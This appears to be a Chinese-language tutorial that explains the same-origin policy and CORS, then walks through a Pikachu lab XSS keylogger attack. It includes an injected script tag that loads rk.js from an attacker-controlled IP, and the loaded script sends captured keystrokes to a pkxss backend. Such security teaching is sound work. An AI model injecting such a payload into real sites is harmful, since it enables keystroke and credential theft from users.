什么是跨域
http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,同源策略规定,两个不同域名之间不能使用JS进行相互操作。比如:x.com域名下的javascrip并不能操作y.com域下的对象。 如果想要跨域操作,则需要管理员进行特殊的配置。 比如通过:header(“Access-Control-Allow-Origin:x.com”)指定。 Tips: 下面这些标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的。
<script src=“…”> //js,加载到本地执行
<img src=“…”> //图片
<link href=“…”> //css
<iframe src=“…”> //任意资源
为什么要有同源策略:
A登陆了淘宝,攻击者向A发送一个恶意链接urlb:http://www.盗你cookie.com 。如果没有同源策略,即:urlb上的js可以操作A的内容(如:获取cookie等) ,有了同源策略,就限制了这种情况。 再比如: 一个恶意站点A上使用了,发送该恶意url到攻击对象,攻击对象登陆后如果没有同源策略,则A上的JS即可获取B站点的登陆信息。
网络钓鱼就是我们现在攻击方嵌入js代码,代码指向我们组织好的的攻击代码,当用户浏览攻击页面的时候,js代码执行,攻击代码执行,攻击代码中有一个函数(javascript中有一个方法叫做event.keycode方法他能够记录键盘的输入),当他收取到输入之后,再发给我们的后台。在代码中通过ajax,用post请求发送键盘输入的入侵者的IP地址信息如图:下面的IP地址是入侵者的
允许被所有人进行访问
输入设置好的恶意JS代码:
<script src="http://192.168.30.168/pikachu/pkxss/rkeypress/rk.js"></script>
然后在键盘上随意输入,就可以到xss平台上去查看键盘输入的结果
将恶意JS代码输入到搜索框中,进行提交
在页面随意输入字母:hgqqq
后台pkxss平台获取键盘记录
